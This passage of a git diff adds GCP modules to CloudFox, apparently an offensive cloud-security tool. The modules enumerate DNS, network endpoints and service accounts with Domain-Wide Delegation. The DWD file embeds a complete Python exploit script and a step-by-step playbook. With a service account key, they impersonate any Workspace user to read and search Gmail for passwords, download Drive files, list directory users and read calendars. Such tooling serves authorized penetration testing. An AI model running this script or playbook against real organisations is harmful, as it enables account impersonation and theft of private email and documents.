globals.GCP_DNS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *DNSModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allZones := m.getAllZones() + allRecords := m.getAllRecords() + + zonesBody := m.zonesToTableBody(allZones) + recordsBody := m.recordsToTableBody(allRecords) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + var tableFiles []internal.TableFile + if len(zonesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-zones", + Header: m.getZonesHeader(), + Body: zonesBody, + }) + } + if len(recordsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_DNS_MODULE_NAME + "-records", + Header: m.getRecordsHeader(), + Body: recordsBody, + }) + } + + output := DNSOutput{Table: tableFiles, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DNS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/domainwidedelegation.go b/gcp/commands/domainwidedelegation.go new file mode 100755 index 00000000..818c737b --- /dev/null +++ b/gcp/commands/domainwidedelegation.go @@ -0,0 +1,758 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + domainwidedelegationservice "github.com/BishopFox/cloudfox/gcp/services/domainWideDelegationService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDomainWideDelegationCommand = &cobra.Command{ + Use: globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, + Aliases: []string{"dwd", "delegation", "workspace-delegation"}, + Short: "Find service accounts with Domain-Wide Delegation to Google Workspace", + Long: `Find service accounts configured for Domain-Wide Delegation (DWD). + +Domain-Wide Delegation allows a service account to impersonate any user in a +Google Workspace domain. This is EXTREMELY powerful and a high-value target. + +With DWD + a service account key, an attacker can: +- Read any user's Gmail +- Access any user's Google Drive +- View any user's Calendar +- Enumerate all users and groups via Admin Directory API +- Send emails as any user +- And much more depending on authorized scopes + +Detection Method: +- Service accounts with OAuth2 Client ID set have DWD enabled +- The actual authorized scopes are configured in Google Admin Console +- We check for naming patterns that suggest DWD purpose + +To Exploit: +1. Obtain a key for the DWD service account +2. Identify a target user email in the Workspace domain +3. Generate tokens with the target user as 'subject' +4. Access Workspace APIs as that user + +Note: Scopes must be authorized in Admin Console > Security > API Controls`, + Run: runGCPDomainWideDelegationCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DomainWideDelegationModule struct { + gcpinternal.BaseGCPModule + + ProjectDWDAccounts map[string][]domainwidedelegationservice.DWDServiceAccount // projectID -> accounts + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DomainWideDelegationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DomainWideDelegationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DomainWideDelegationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDomainWideDelegationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + if err != nil { + return + } + + module := &DomainWideDelegationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectDWDAccounts: make(map[string][]domainwidedelegationservice.DWDServiceAccount), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DomainWideDelegationModule) getAllDWDAccounts() []domainwidedelegationservice.DWDServiceAccount { + var all []domainwidedelegationservice.DWDServiceAccount + for _, accounts := range m.ProjectDWDAccounts { + all = append(all, accounts...) + } + return all +} + +func (m *DomainWideDelegationModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, m.processProject) + + allAccounts := m.getAllDWDAccounts() + if len(allAccounts) == 0 { + logger.InfoM("No Domain-Wide Delegation service accounts found", globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + return + } + + // Count confirmed DWD accounts + confirmedDWD := 0 + criticalCount := 0 + for _, account := range allAccounts { + if account.DWDEnabled { + confirmedDWD++ + } + if account.RiskLevel == "CRITICAL" { + criticalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d potential DWD service account(s) (%d confirmed)", len(allAccounts), confirmedDWD), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + + if criticalCount > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] %d DWD accounts with keys - can impersonate Workspace users!", criticalCount), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DomainWideDelegationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking DWD service accounts in project: %s", projectID), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.mu.Unlock() + + svc := domainwidedelegationservice.New() + accounts, err := svc.GetDWDServiceAccounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, + fmt.Sprintf("Could not check DWD service accounts in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectDWDAccounts[projectID] = accounts + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS && len(accounts) > 0 { + logger.InfoM(fmt.Sprintf("Found %d DWD account(s) in project %s", len(accounts), projectID), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ + +// generateDWDPythonScript returns the Python exploit script (generated once globally) +func (m *DomainWideDelegationModule) generateDWDPythonScript() internal.LootFile { + pythonScript := `#!/usr/bin/env python3 +""" +Domain-Wide Delegation (DWD) Exploitation Script +Generated by CloudFox + +Usage: + # Interactive mode (authenticate once, run multiple actions): + python dwd_exploit.py --key-file KEY.json --subject user@domain.com + + # Single command mode: + python dwd_exploit.py --key-file KEY.json --subject user@domain.com --action read-emails + python dwd_exploit.py --key-file KEY.json --subject user@domain.com --all-scopes +""" + +import argparse +import base64 +import io +import sys +from google.oauth2 import service_account +from googleapiclient.discovery import build +from googleapiclient.http import MediaIoBaseDownload + +SCOPES = { + 'gmail_readonly': 'https://www.googleapis.com/auth/gmail.readonly', + 'gmail_send': 'https://www.googleapis.com/auth/gmail.send', + 'gmail_full': 'https://mail.google.com/', + 'drive_readonly': 'https://www.googleapis.com/auth/drive.readonly', + 'drive_full': 'https://www.googleapis.com/auth/drive', + 'calendar_readonly': 'https://www.googleapis.com/auth/calendar.readonly', + 'calendar_full': 'https://www.googleapis.com/auth/calendar', + 'admin_directory_users': 'https://www.googleapis.com/auth/admin.directory.user.readonly', + 'admin_directory_groups': 'https://www.googleapis.com/auth/admin.directory.group.readonly', + 'contacts': 'https://www.googleapis.com/auth/contacts.readonly', + 'sheets': 'https://www.googleapis.com/auth/spreadsheets', +} + +class DWDExploit: + def __init__(self, key_file, subject): + self.key_file = key_file + self.subject = subject + self.services = {} + self.working_scopes = set() + print(f"\n[*] Initialized DWD exploit") + print(f" Key file: {key_file}") + print(f" Subject: {subject}") + + def get_credentials(self, scopes): + if isinstance(scopes, str): + scopes = [scopes] + return service_account.Credentials.from_service_account_file( + self.key_file, scopes=scopes, subject=self.subject + ) + + def get_service(self, service_name, version, scope): + """Get or create a cached service.""" + key = f"{service_name}_{version}_{scope}" + if key not in self.services: + creds = self.get_credentials(SCOPES[scope]) + self.services[key] = build(service_name, version, credentials=creds) + return self.services[key] + + def test_all_scopes(self): + """Test which scopes are authorized.""" + print(f"\n[*] Testing all scopes for {self.subject}...") + for scope_name, scope_url in SCOPES.items(): + print(f"\n[*] Testing: {scope_name}") + try: + creds = self.get_credentials(scope_url) + if 'gmail' in scope_name: + service = build('gmail', 'v1', credentials=creds) + results = service.users().messages().list(userId='me', maxResults=5).execute() + count = len(results.get('messages', [])) + print(f" [+] SUCCESS - Found {count} messages") + self.working_scopes.add(scope_name) + elif 'drive' in scope_name: + service = build('drive', 'v3', credentials=creds) + results = service.files().list(pageSize=5).execute() + count = len(results.get('files', [])) + print(f" [+] SUCCESS - Found {count} files") + self.working_scopes.add(scope_name) + elif 'calendar' in scope_name: + service = build('calendar', 'v3', credentials=creds) + results = service.calendarList().list().execute() + count = len(results.get('items', [])) + print(f" [+] SUCCESS - Found {count} calendars") + self.working_scopes.add(scope_name) + elif 'admin_directory' in scope_name: + service = build('admin', 'directory_v1', credentials=creds) + results = service.users().list(customer='my_customer', maxResults=5).execute() + count = len(results.get('users', [])) + print(f" [+] SUCCESS - Found {count} users") + self.working_scopes.add(scope_name) + else: + print(f" [+] SUCCESS - Credentials created") + self.working_scopes.add(scope_name) + except Exception as e: + print(f" [-] FAILED: {str(e)[:80]}") + + print(f"\n[+] Working scopes: {', '.join(self.working_scopes) if self.working_scopes else 'None'}") + + def read_emails(self, max_results=20): + """Read emails from user's inbox.""" + service = self.get_service('gmail', 'v1', 'gmail_readonly') + results = service.users().messages().list(userId='me', maxResults=max_results).execute() + messages = results.get('messages', []) + + print(f"\n[+] Reading {len(messages)} emails for {self.subject}:\n") + for msg in messages: + msg_data = service.users().messages().get(userId='me', id=msg['id'], format='full').execute() + headers = {h['name']: h['value'] for h in msg_data['payload']['headers']} + + print(f"{'='*60}") + print(f"From: {headers.get('From', 'N/A')}") + print(f"To: {headers.get('To', 'N/A')}") + print(f"Subject: {headers.get('Subject', 'N/A')}") + print(f"Date: {headers.get('Date', 'N/A')}") + + body = "" + if 'parts' in msg_data['payload']: + for part in msg_data['payload']['parts']: + if part['mimeType'] == 'text/plain' and 'data' in part.get('body', {}): + body = base64.urlsafe_b64decode(part['body']['data']).decode('utf-8', errors='ignore') + break + elif 'body' in msg_data['payload'] and 'data' in msg_data['payload']['body']: + body = base64.urlsafe_b64decode(msg_data['payload']['body']['data']).decode('utf-8', errors='ignore') + + if body: + print(f"\nBody:\n{body[:500]}{'...' if len(body) > 500 else ''}") + print() + + def search_emails(self, query): + """Search emails with a query.""" + service = self.get_service('gmail', 'v1', 'gmail_readonly') + results = service.users().messages().list(userId='me', q=query, maxResults=20).execute() + messages = results.get('messages', []) + + print(f"\n[+] Found {len(messages)} emails matching '{query}':\n") + for msg in messages: + msg_data = service.users().messages().get(userId='me', id=msg['id'], format='metadata').execute() + headers = {h['name']: h['value'] for h in msg_data['payload']['headers']} + print(f" - {headers.get('Subject', 'N/A')[:60]} | From: {headers.get('From', 'N/A')[:30]}") + + def list_drive(self, max_results=50): + """List files in user's Drive.""" + service = self.get_service('drive', 'v3', 'drive_readonly') + results = service.files().list( + pageSize=max_results, + fields="files(id, name, mimeType, size, modifiedTime)" + ).execute() + files = results.get('files', []) + + print(f"\n[+] Found {len(files)} files in Drive:\n") + for f in files: + size = f.get('size', 'N/A') + if size != 'N/A': + size = f"{int(size)/1024:.1f}KB" + print(f" [{f['id'][:12]}] {f['name'][:45]} ({f['mimeType'].split('.')[-1]}) {size}") + + def download_file(self, file_id, output_path=None): + """Download a file from Drive.""" + service = self.get_service('drive', 'v3', 'drive_readonly') + file_meta = service.files().get(fileId=file_id, fields='name,mimeType').execute() + filename = output_path or file_meta['name'] + + request = service.files().get_media(fileId=file_id) + fh = io.BytesIO() + downloader = MediaIoBaseDownload(fh, request) + + done = False + while not done: + status, done = downloader.next_chunk() + print(f"\r[*] Download: {int(status.progress() * 100)}%", end='') + + with open(filename, 'wb') as f: + f.write(fh.getvalue()) + print(f"\n[+] Downloaded: {filename}") + + def list_users(self): + """List all Workspace users.""" + service = self.get_service('admin', 'directory_v1', 'admin_directory_users') + results = service.users().list(customer='my_customer', maxResults=200).execute() + users = results.get('users', []) + + print(f"\n[+] Found {len(users)} Workspace users:\n") + for user in users: + name = user.get('name', {}).get('fullName', 'N/A') + admin = "ADMIN" if user.get('isAdmin') else "" + print(f" - {user.get('primaryEmail'):<40} {name:<25} {admin}") + + def list_calendars(self): + """List user's calendars.""" + service = self.get_service('calendar', 'v3', 'calendar_readonly') + results = service.calendarList().list().execute() + calendars = results.get('items', []) + + print(f"\n[+] Found {len(calendars)} calendars:\n") + for cal in calendars: + print(f" - {cal.get('summary', 'N/A')} ({cal.get('id', 'N/A')[:40]})") + + def list_events(self, max_results=20): + """List upcoming calendar events.""" + from datetime import datetime + service = self.get_service('calendar', 'v3', 'calendar_readonly') + now = datetime.utcnow().isoformat() + 'Z' + results = service.events().list( + calendarId='primary', timeMin=now, maxResults=max_results, singleEvents=True, orderBy='startTime' + ).execute() + events = results.get('items', []) + + print(f"\n[+] Found {len(events)} upcoming events:\n") + for event in events: + start = event['start'].get('dateTime', event['start'].get('date')) + print(f" - {start[:16]} | {event.get('summary', 'No title')}") + + def change_subject(self, new_subject): + """Change the impersonated user.""" + self.subject = new_subject + self.services = {} # Clear cached services + print(f"\n[+] Now impersonating: {new_subject}") + + def interactive(self): + """Interactive mode - run multiple actions without re-authenticating.""" + print("\n" + "="*60) + print(" DWD Interactive Mode") + print(" Type 'help' for commands, 'quit' to exit") + print("="*60) + + while True: + try: + cmd = input(f"\n[{self.subject}]> ").strip().lower() + except (EOFError, KeyboardInterrupt): + print("\n[*] Exiting...") + break + + if not cmd: + continue + + parts = cmd.split(maxsplit=1) + action = parts[0] + args = parts[1] if len(parts) > 1 else "" + + try: + if action in ('quit', 'exit', 'q'): + print("[*] Exiting...") + break + elif action == 'help': + self.print_help() + elif action == 'test' or action == 'scopes': + self.test_all_scopes() + elif action == 'emails' or action == 'inbox': + self.read_emails() + elif action == 'search': + if not args: + args = input(" Search query: ").strip() + self.search_emails(args) + elif action == 'drive' or action == 'files': + self.list_drive() + elif action == 'download': + if not args: + args = input(" File ID: ").strip() + self.download_file(args) + elif action == 'users': + self.list_users() + elif action == 'calendars': + self.list_calendars() + elif action == 'events': + self.list_events() + elif action == 'subject' or action == 'impersonate': + if not args: + args = input(" New subject email: ").strip() + self.change_subject(args) + elif action == 'whoami': + print(f"\n Key file: {self.key_file}") + print(f" Subject: {self.subject}") + print(f" Working scopes: {', '.join(self.working_scopes) if self.working_scopes else 'Not tested yet'}") + else: + print(f" Unknown command: {action}. Type 'help' for commands.") + except Exception as e: + print(f" [!] Error: {e}") + + def print_help(self): + print(""" + Commands: + test / scopes - Test which scopes are authorized + emails / inbox - Read inbox emails + search - Search emails (e.g., search password) + drive / files - List Google Drive files + download - Download a Drive file + users - List all Workspace users (requires admin) + calendars - List calendars + events - List upcoming calendar events + subject - Switch to impersonate a different user + whoami - Show current configuration + help - Show this help + quit / exit / q - Exit interactive mode + """) + + +def main(): + parser = argparse.ArgumentParser(description='DWD Exploitation Script') + parser.add_argument('--key-file', required=True, help='Service account key JSON file') + parser.add_argument('--subject', required=True, help='Email of user to impersonate') + parser.add_argument('--all-scopes', action='store_true', help='Test all scopes and exit') + parser.add_argument('--action', choices=[ + 'read-emails', 'search-emails', 'list-drive', 'download-file', + 'list-users', 'list-calendars', 'list-events' + ], help='Single action to perform (non-interactive)') + parser.add_argument('--query', help='Search query for search-emails') + parser.add_argument('--file-id', help='File ID for download-file') + parser.add_argument('--output', help='Output path for download-file') + args = parser.parse_args() + + exploit = DWDExploit(args.key_file, args.subject) + + # Single action modes + if args.all_scopes: + exploit.test_all_scopes() + elif args.action == 'read-emails': + exploit.read_emails() + elif args.action == 'search-emails': + if not args.query: + parser.error('--query is required for search-emails') + exploit.search_emails(args.query) + elif args.action == 'list-drive': + exploit.list_drive() + elif args.action == 'download-file': + if not args.file_id: + parser.error('--file-id is required for download-file') + exploit.download_file(args.file_id, args.output) + elif args.action == 'list-users': + exploit.list_users() + elif args.action == 'list-calendars': + exploit.list_calendars() + elif args.action == 'list-events': + exploit.list_events() + else: + # No action specified - enter interactive mode + exploit.interactive() + +if __name__ == '__main__': + main() +` + + return internal.LootFile{ + Name: "dwd_exploit.py", + Contents: pythonScript, + } +} + +// generateDWDCommands generates the commands file for a specific project's accounts +func (m *DomainWideDelegationModule) generateDWDCommands(accounts []domainwidedelegationservice.DWDServiceAccount) internal.LootFile { + var commands strings.Builder + commands.WriteString(`# Domain-Wide Delegation (DWD) Exploitation Commands +# Generated by CloudFox +# WARNING: Only use with proper authorization + +# ============================================================================= +# STEP 1: INSTALL DEPENDENCIES +# ============================================================================= +pip install google-auth google-auth-oauthlib google-api-python-client + +# ============================================================================= +# STEP 2: CREATE A SERVICE ACCOUNT KEY (if needed) +# ============================================================================= +# Replace with the service account email from above + +gcloud iam service-accounts keys create sa-key.json \ + --iam-account= + +# ============================================================================= +# STEP 3: RUN THE EXPLOIT SCRIPT (INTERACTIVE MODE) +# ============================================================================= +# Replace: +# sa-key.json - Path to the service account key file +# admin@domain.com - Email of Workspace user to impersonate + +# Start interactive mode (recommended - authenticate once, run many commands): +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com + +# Interactive commands: +# test - Test which scopes are authorized +# emails - Read inbox emails +# search - Search emails (e.g., search password reset) +# drive - List Google Drive files +# download - Download a Drive file +# users - List all Workspace users +# calendars - List calendars +# events - List upcoming calendar events +# subject - Switch to impersonate a different user +# whoami - Show current config +# quit - Exit + +# ============================================================================= +# STEP 3 (ALT): SINGLE COMMAND MODE +# ============================================================================= +# If you prefer single commands instead of interactive mode: + +# Test all scopes: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --all-scopes + +# Read emails: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action read-emails + +# Search emails: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action search-emails --query "password" + +# List Drive files: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action list-drive + +# Download a file: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action download-file --file-id FILE_ID + +# List Workspace users: +python dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action list-users + +# ============================================================================= +# NOTES +# ============================================================================= +# - Scopes must be pre-authorized in Google Admin Console: +# Admin Console > Security > API Controls > Domain-wide Delegation +# - The service account's OAuth2 Client ID must be listed there +# - Not all scopes may be authorized - run 'test' to check +# - admin_directory scopes require impersonating a Workspace admin user +# - In interactive mode, use 'subject' command to switch users without restarting +`) + + return internal.LootFile{ + Name: "dwd-playbook", + Contents: commands.String(), + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *DomainWideDelegationModule) getHeader() []string { + return []string{ + "Project", + "Email", + "DWD Enabled", + "OAuth2 Client ID", + "Key ID", + "Key Created", + "Key Expires", + "Key Algorithm", + } +} + +func (m *DomainWideDelegationModule) accountsToTableBody(accounts []domainwidedelegationservice.DWDServiceAccount) [][]string { + var body [][]string + for _, account := range accounts { + dwdStatus := "No" + if account.DWDEnabled { + dwdStatus = "Yes" + } + + clientID := account.OAuth2ClientID + if clientID == "" { + clientID = "-" + } + + if len(account.Keys) > 0 { + // One row per key + for _, key := range account.Keys { + body = append(body, []string{ + m.GetProjectName(account.ProjectID), + account.Email, + dwdStatus, + clientID, + key.KeyID, + key.CreatedAt, + key.ExpiresAt, + key.KeyAlgorithm, + }) + } + } else { + // Account with no keys - still show it + body = append(body, []string{ + m.GetProjectName(account.ProjectID), + account.Email, + dwdStatus, + clientID, + "-", + "-", + "-", + "-", + }) + } + } + return body +} + +func (m *DomainWideDelegationModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if accounts, ok := m.ProjectDWDAccounts[projectID]; ok && len(accounts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "domain-wide-delegation", + Header: m.getHeader(), + Body: m.accountsToTableBody(accounts), + }) + } + + return tableFiles +} + +func (m *DomainWideDelegationModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Generate Python script once (same for all projects) + pythonScript := m.generateDWDPythonScript() + + for projectID, accounts := range m.ProjectDWDAccounts { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if len(accounts) > 0 { + // Add Python script to each project + lootFiles = append(lootFiles, pythonScript) + // Add project-specific commands + lootFiles = append(lootFiles, m.generateDWDCommands(accounts)) + } + + outputData.ProjectLevelData[projectID] = DomainWideDelegationOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } +} + +func (m *DomainWideDelegationModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allAccounts := m.getAllDWDAccounts() + + var tables []internal.TableFile + + if len(allAccounts) > 0 { + tables = append(tables, internal.TableFile{ + Name: "domain-wide-delegation", + Header: m.getHeader(), + Body: m.accountsToTableBody(allAccounts), + }) + } + + var lootFiles []internal.LootFile + if len(allAccounts) > 0 { + lootFiles = append(lootFiles, m.generateDWDPythonScript()) + lootFiles = append(lootFiles, m.generateDWDCommands(allAccounts)) + } + + output := DomainWideDelegationOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go new file mode 100755 index 00000000..9ae3a094 --- /dev/null +++ b/gcp/commands/endpoints.go @@ -0,0 +1,1537 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + cloudsqlservice "github.com/BishopFox/cloudfox/gcp/services/cloudsqlService" + composerservice "github.com/BishopFox/cloudfox/gcp/services/composerService" + dataprocservice "github.com/BishopFox/cloudfox/gcp/services/dataprocService" + filestoreservice "github.com/BishopFox/cloudfox/gcp/services/filestoreService" + functionsservice "github.com/BishopFox/cloudfox/gcp/services/functionsService" + gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" + memorystoreservice "github.com/BishopFox/cloudfox/gcp/services/memorystoreService" + notebooksservice "github.com/BishopFox/cloudfox/gcp/services/notebooksService" + pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + appengine "google.golang.org/api/appengine/v1" + compute "google.golang.org/api/compute/v1" + run "google.golang.org/api/run/v1" +) + +var GCPEndpointsCommand = &cobra.Command{ + Use: "endpoints", + Aliases: []string{"exposure", "external", "public-ips", "internet-facing"}, + Short: "Enumerate all network endpoints (external and internal) with IPs, URLs, and hostnames", + Long: `Enumerate all network endpoints in GCP with comprehensive analysis. + +Features: +- Static external IP addresses +- Compute Engine instances (external and internal IPs) +- Load balancers (HTTP(S), TCP, UDP) - external and internal +- Cloud Run services and jobs +- Cloud Functions HTTP triggers +- GKE cluster API endpoints +- Cloud SQL instances (MySQL, PostgreSQL, SQL Server) +- Memorystore Redis instances +- Filestore NFS instances +- Cloud Composer/Airflow web UI URLs +- Pub/Sub push subscription endpoints +- App Engine services +- Vertex AI Notebooks +- Dataproc clusters (master/worker nodes) +- VPN Gateways +- Cloud NAT gateways +- Private Service Connect endpoints + +Output includes a unified table with Exposure (External/Internal) column.`, + Run: runGCPEndpointsCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type Endpoint struct { + ProjectID string + Name string + Type string // Static IP, Instance, LoadBalancer, Cloud Run, GKE, Cloud SQL, etc. + ExternalIP string + InternalIP string + Hostname string + Protocol string + Port string + Resource string + ResourceType string + Region string + Status string + ServiceAccount string + TLSEnabled bool + IsExternal bool // true for external, false for internal + Network string // VPC network name + Security string // Security notes (e.g., "No Auth", "Public", "SSL Required") +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type EndpointsModule struct { + gcpinternal.BaseGCPModule + + ProjectEndpoints map[string][]Endpoint // projectID -> endpoints + mu sync.Mutex + + // Firewall rule mapping: "network:tag1,tag2" -> allowed ports + firewallPortMap map[string][]string +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type EndpointsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o EndpointsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o EndpointsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPEndpointsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "endpoints") + if err != nil { + return + } + + module := &EndpointsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectEndpoints: make(map[string][]Endpoint), + firewallPortMap: make(map[string][]string), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *EndpointsModule) getAllEndpoints() []Endpoint { + var all []Endpoint + for _, endpoints := range m.ProjectEndpoints { + all = append(all, endpoints...) + } + return all +} + +func (m *EndpointsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "endpoints", m.processProject) + + allEndpoints := m.getAllEndpoints() + if len(allEndpoints) == 0 { + logger.InfoM("No endpoints found", "endpoints") + return + } + + // Count external vs internal + externalCount := 0 + internalCount := 0 + for _, ep := range allEndpoints { + if ep.IsExternal { + externalCount++ + } else { + internalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d endpoint(s) [%d external, %d internal]", + len(allEndpoints), externalCount, internalCount), "endpoints") + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *EndpointsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing endpoints in project: %s", projectID), "endpoints") + } + + computeService, err := compute.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not create Compute service in project %s", projectID)) + } else { + // Compute-based endpoints + m.analyzeFirewallRules(ctx, computeService, projectID, logger) + m.getStaticExternalIPs(ctx, computeService, projectID, logger) + m.getInstanceIPs(ctx, computeService, projectID, logger) + m.getLoadBalancers(ctx, computeService, projectID, logger) + m.getVPNGateways(ctx, computeService, projectID, logger) + m.getCloudNAT(ctx, computeService, projectID, logger) + m.getPrivateServiceConnect(ctx, computeService, projectID, logger) + } + + // Serverless endpoints + m.getCloudRunServices(ctx, projectID, logger) + m.getCloudFunctions(ctx, projectID, logger) + m.getAppEngineServices(ctx, projectID, logger) + + // Container/Kubernetes endpoints + m.getGKEClusters(ctx, projectID, logger) + + // Database endpoints + m.getCloudSQLInstances(ctx, projectID, logger) + m.getMemorystoreRedis(ctx, projectID, logger) + + // Storage endpoints + m.getFilestoreInstances(ctx, projectID, logger) + + // Data/ML endpoints + m.getComposerEnvironments(ctx, projectID, logger) + m.getDataprocClusters(ctx, projectID, logger) + m.getNotebookInstances(ctx, projectID, logger) + + // Messaging endpoints + m.getPubSubPushEndpoints(ctx, projectID, logger) +} + +// getStaticExternalIPs retrieves static external IP addresses +func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Global addresses + req := svc.GlobalAddresses.List(projectID) + if err := req.Pages(ctx, func(page *compute.AddressList) error { + for _, addr := range page.Items { + if addr.AddressType == "EXTERNAL" { + user := "" + if len(addr.Users) > 0 { + user = extractResourceName(addr.Users[0]) + } + security := "" + if user == "" { + security = "Unused" + } + ep := Endpoint{ + ProjectID: projectID, + Name: addr.Name, + Type: "Static IP", + ExternalIP: addr.Address, + Protocol: "TCP/UDP", + Port: "ALL", 